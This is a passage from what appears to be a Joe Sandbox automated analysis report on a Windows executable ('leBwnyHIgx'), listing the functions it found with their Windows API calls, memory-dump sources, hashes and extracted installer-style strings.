                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CountSleepTick
                                                                                    • String ID:
                                                                                    • API String ID: 2227064392-0
                                                                                    • Opcode ID: 0d34409079f3285415336e5086e324ebfbbd45d85097019a7f8f2458989eb29f
                                                                                    • Instruction ID: 8c410b6b5025aaf122e9bdc0c1ce3c8724fef5309a0de07dabf959826b4bab6c
                                                                                    • Opcode Fuzzy Hash: 0d34409079f3285415336e5086e324ebfbbd45d85097019a7f8f2458989eb29f
                                                                                    • Instruction Fuzzy Hash: 40E0E57230C2410EA32032AE18866BE594BDA97394F35097BF180C1216CD088C968136
                                                                                    Function 0063DA44 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000008), ref: 0063DA4D
                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000008), ref: 0063DA53
                                                                                    • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008), ref: 0063DA75
                                                                                    • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008), ref: 0063DA86
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                    • String ID:
                                                                                    • API String ID: 215268677-0
                                                                                    • Opcode ID: 52eacd67af02c92b88f6b7150cd3555fd3abc884029a5d5279a962a9430070f6
                                                                                    • Instruction ID: a157fd3303c1430b13f319c7757610127fd6bd2de266f3ae7d41e5c3beec6acc
                                                                                    • Opcode Fuzzy Hash: 52eacd67af02c92b88f6b7150cd3555fd3abc884029a5d5279a962a9430070f6
                                                                                    • Instruction Fuzzy Hash: 59F030706483006BD700EBA5DD82EDB76DCAF44394F00492EBF94C7291E678D95897A2
                                                                                    Function 004E43D0 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDC.USER32 ref: 004E43D9
                                                                                    • SelectObject.GDI32(00000000,058A00B4), ref: 004E43EB
                                                                                    • GetTextMetricsW.GDI32(00000000), ref: 004E43F6
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 004E4407
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: MetricsObjectReleaseSelectText
                                                                                    • String ID:
                                                                                    • API String ID: 2013942131-0
                                                                                    • Opcode ID: a6aecb0737437b3e4e44ddca18d58a6d0b7d8c9274c0db10c9c3bc7fb89915e8
                                                                                    • Instruction ID: d4d349d3644daeae5b714f5edb0297babd8c78eacc5647d64bd84649639e733b
                                                                                    • Opcode Fuzzy Hash: a6aecb0737437b3e4e44ddca18d58a6d0b7d8c9274c0db10c9c3bc7fb89915e8
                                                                                    • Instruction Fuzzy Hash: 33E04F617026A126D61161A75D82BEB274C4F423AAF08012AFD54D92E3DA4DCD62C2FA
                                                                                    Function 00645F94 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 148windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageNotifySend
                                                                                    • String ID: HW[$MS PGothic
                                                                                    • API String ID: 3556456075-2635353643
                                                                                    • Opcode ID: 59f04f6aee3bffc9c1295158f9acede3f64b47b25c96f5cb70cb93cdb20aa1c8
                                                                                    • Instruction ID: bceb75bb431b8eb4c574679ca4a5eb6d1cf06a39740a1e3265182ded441c346e
                                                                                    • Opcode Fuzzy Hash: 59f04f6aee3bffc9c1295158f9acede3f64b47b25c96f5cb70cb93cdb20aa1c8
                                                                                    • Instruction Fuzzy Hash: EC5140703102018BCB10EF69D985E967BA3FB55304B14517AF845AF3A7CA78EC46CF9A
                                                                                    Function 005F8B78 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,005F8C6D,?,0066978C,?,00000003,00000000,00000000,?,006444C3,00000000,006445EE), ref: 005F8BC0
                                                                                    • GetLastError.KERNEL32(00000000,00000000,?,00000000,005F8C6D,?,0066978C,?,00000003,00000000,00000000,?,006444C3,00000000,006445EE), ref: 005F8BC9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID: .tmp
                                                                                    • API String ID: 1375471231-2986845003
                                                                                    • Opcode ID: 0dd2e78ac53445f243b90664175e46d6b94ca7fdf7539982ce6cd959b1b8a79f
                                                                                    • Instruction ID: c4b9951d0c9cc56d7ffc3af5a52d4afc2fe12c17b36d5983631b7f23f90a8f37
                                                                                    • Opcode Fuzzy Hash: 0dd2e78ac53445f243b90664175e46d6b94ca7fdf7539982ce6cd959b1b8a79f
                                                                                    • Instruction Fuzzy Hash: 32214675A0010D9FDB00EBA4C956AFEB7F9FB88304F50457AF900B7381DA386E058AA4
                                                                                    Function 0064EC32 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 0064EC72
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window
                                                                                    • String ID: /INITPROCWND=$%x $@
                                                                                    • API String ID: 2353593579-4169826103
                                                                                    • Opcode ID: 10bae26bf5f2a0ea0e044a5652ad93d77c5c1b14996636414ded1eee9e9c8fb2
                                                                                    • Instruction ID: 8b2991d2d1f953f99e0989ce018fc3471add5941c41498d69d44fc2df87f3202
                                                                                    • Opcode Fuzzy Hash: 10bae26bf5f2a0ea0e044a5652ad93d77c5c1b14996636414ded1eee9e9c8fb2
                                                                                    • Instruction Fuzzy Hash: A321A234A043499FDB04EBA4DC91EEEBBF6FF49304F64447AE500E7291DA799904C754
                                                                                    Function 0064FAA7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005FA9A8: GetCurrentProcess.KERNEL32(00000028), ref: 005FA9B8
                                                                                      • Part of subcall function 005FA9A8: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 005FA9BE
                                                                                    • SetForegroundWindow.USER32(?), ref: 0064FAE0
                                                                                    Strings
                                                                                    • Restarting Windows., xrefs: 0064FAB7
                                                                                    • Not restarting Windows because Uninstall is being run from the debugger., xrefs: 0064FB17
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentForegroundOpenTokenWindow
                                                                                    • String ID: Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.
                                                                                    • API String ID: 3179053593-4147564754
                                                                                    • Opcode ID: 6f7ce231d12e7b0590e1307c51da8fb0449973e99580584b367fabd86af75305
                                                                                    • Instruction ID: d4bf9f36ef96bf7cd5cd4c99b625b6b1cd4e930e58df0cf614d5cda783460847
                                                                                    • Opcode Fuzzy Hash: 6f7ce231d12e7b0590e1307c51da8fb0449973e99580584b367fabd86af75305
                                                                                    • Instruction Fuzzy Hash: 341182346002449FEB04EB94E896FD837E6EB46304F5150BAF804AB3E2CB78AD41C716
                                                                                    Function 004085D8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateThread
                                                                                    • String ID: lF$lF
                                                                                    • API String ID: 2422867632-1147170537
                                                                                    • Opcode ID: 92e9bf36f33061f7ffdd7491b72976703523c6d92d1ec2ca90417502ef735539
                                                                                    • Instruction ID: c79f99a2a18cb61d71feea710bf58fa565dd156bb3bf8665f6744fc7077f86ea
                                                                                    • Opcode Fuzzy Hash: 92e9bf36f33061f7ffdd7491b72976703523c6d92d1ec2ca90417502ef735539
                                                                                    • Instruction Fuzzy Hash: 33017171605214AFC750CF9D9980B8EB7ECDB58361F10443AF508E73C1DA75DD0087A8
                                                                                    Function 00412B68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateWindow
                                                                                    • String ID: B)[$TWindowDisabler-Window
                                                                                    • API String ID: 716092398-1377837600
                                                                                    • Opcode ID: 684ecf370dcf3c6758cf9d82a20f104a3e22c221ceaad4062406452089a2450d
                                                                                    • Instruction ID: d28f3a87fa927ce1738d04863a1b4a791b24e040aa09da8391ad3ec004184475
                                                                                    • Opcode Fuzzy Hash: 684ecf370dcf3c6758cf9d82a20f104a3e22c221ceaad4062406452089a2450d
                                                                                    • Instruction Fuzzy Hash: 74F074B2604118AF8B40DE9DDC81EDB77ECEB4D264B05412ABA08E3201D634ED118BA4
                                                                                    Function 004309F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(2C), ref: 00430A04
                                                                                      • Part of subcall function 00408B6C: SysReAllocStringLen.OLEAUT32(00000000,?,00000071), ref: 00408B86
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocInitStringVariant
                                                                                    • String ID: 2C$WC
                                                                                    • API String ID: 4010818693-495268985
                                                                                    • Opcode ID: df370b3d9da647af4402dd277e6d6925b7b152161429339756cd47c20e76cd35
                                                                                    • Instruction ID: 96bda85ea37abc6d5613da839bc8b5d910035a35706cb6c2dd4bd2584f76f0b9
                                                                                    • Opcode Fuzzy Hash: df370b3d9da647af4402dd277e6d6925b7b152161429339756cd47c20e76cd35
                                                                                    • Instruction Fuzzy Hash: F1F0A471700608AFD700EB99DC92E9FB3FCEB48700FA04176F500E3290DA78AE0486A9
                                                                                    Function 00643D50 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0064413B,00000000,00644156,?,00000000,00000000,?,0064F4D6,00000006), ref: 00643DB2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID: RegisteredOrganization$RegisteredOwner
                                                                                    • API String ID: 3535843008-1113070880
                                                                                    • Opcode ID: 301571e57bfd22d937d0251fdeb13fcc7fbfda80df1ff37fee867360dc904415
                                                                                    • Instruction ID: 79ba88330415bd06f82effed11eda8edd571365fffeee20c77ff8264b35cb024
                                                                                    • Opcode Fuzzy Hash: 301571e57bfd22d937d0251fdeb13fcc7fbfda80df1ff37fee867360dc904415
                                                                                    • Instruction Fuzzy Hash: E9F0B470B04194AFDB10DAD4DD46BAA7BAFEF85344F241029E2409B391D6B0EF40CB55
                                                                                    Function 0065061C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 006449EC: FreeLibrary.KERNEL32(?,00650648,00000000,00650657,?,?,?,?,?,0065113B), ref: 00644A02
                                                                                      • Part of subcall function 006446DC: GetTickCount.KERNEL32 ref: 00644724
                                                                                      • Part of subcall function 00600808: SendMessageW.USER32(?,00000B01,00000000,00000000), ref: 00600827
                                                                                    • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0065113B), ref: 00650671
                                                                                    • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0065113B), ref: 00650677
                                                                                    Strings
                                                                                    • Detected restart. Removing temporary directory., xrefs: 0065062B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
